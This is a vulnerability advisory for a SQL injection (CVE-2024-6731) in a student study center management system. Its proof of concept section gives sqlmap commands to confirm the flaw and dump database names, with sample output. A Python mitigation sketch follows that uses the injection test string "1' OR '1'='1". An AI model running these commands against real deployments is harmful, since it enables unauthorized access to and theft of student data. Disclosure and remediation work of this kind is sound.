
CVE-2024-6731

 

Details

Attack type: SQL injection

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Vendor: SourceCodester

Product: Student Study Center Desk Management System

Affected components: /sscdms/classes/Master.php?f=save_student

Injection parameter: MULTIPART id

 

POC

1. Intercept the request using the Burp Suite proxy.

2. Save the request to save_student.txt.

The vulnerability can be verified with the following command:

sqlmap -r save_student.txt --batch


Parameter: MULTIPART id ((custom) POST)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
Payload: -----------------------------250939851917583644163997292923
Content-Disposition: form-data; name="id"

Databases can be dumped with the following command:

sqlmap -r save_student.txt --batch --dbs


[10:03:23] [INFO] fetching database names
[10:03:23] [INFO] retrieved: 'information_schema'
[10:03:24] [INFO] retrieved: 'sscdms'
available databases [2]:
[*] information_schema
[*] sscdms
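
Mitigation sketch for the multipart `id` parameter of save_student, added here as an example; it is not the vendor's code. It uses Python with an in-memory SQLite database as a stand-in for the PHP/MySQL application. The table `student_list`, the `fullname` field, the boundary value and the 10-digit id limit are assumptions.

```python
import re
import sqlite3

BOUNDARY = "constructed-boundary-0001"  # constructed sample value
ID_RE = re.compile(r"[0-9]{1,10}")      # assumption: ids are small decimal integers

def build_body(fields):
    """Build a constructed multipart/form-data body for the demo."""
    parts = [f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in fields.items()]
    return ("".join(parts) + f"--{BOUNDARY}--\r\n").encode()

def multipart_fields(boundary, body):
    """Minimal multipart parser: returns {field name: text value}."""
    fields = {}
    for part in body.split(b"--" + boundary.encode()):
        head, sep, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', head)
        if sep and m:
            fields[m.group(1).decode()] = value.rstrip(b"\r\n").decode("utf-8", "replace")
    return fields

def demo_db():
    """In-memory SQLite stand-in for the application's MySQL database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE student_list (id INTEGER PRIMARY KEY, fullname TEXT)")  # hypothetical schema
    return db

def save_student(db, fields):
    """Hardened save: validate id, then bind every value as a parameter."""
    raw_id = fields.get("id", "")
    if raw_id and not ID_RE.fullmatch(raw_id):
        raise ValueError("id must be empty or a decimal integer")
    name = fields.get("fullname", "")
    if raw_id:  # existing record: id reaches SQL only as a bound integer
        db.execute("UPDATE student_list SET fullname = ? WHERE id = ?", (name, int(raw_id)))
        return int(raw_id)
    cur = db.execute("INSERT INTO student_list (fullname) VALUES (?)", (name,))
    return cur.lastrowid

if __name__ == "__main__":
    db = demo_db()
    new_id = save_student(db, multipart_fields(BOUNDARY, build_body({"id": "", "fullname": "Ada"})))
    print("inserted id", new_id)
    try:
        save_student(db, multipart_fields(BOUNDARY, build_body({"id": "1' OR '1'='1", "fullname": "x"})))
    except ValueError as exc:
        print("rejected:", exc)
```

In the PHP application the same two controls apply: cast or validate `id` as an integer before use, and pass it to the query through a prepared statement rather than string concatenation.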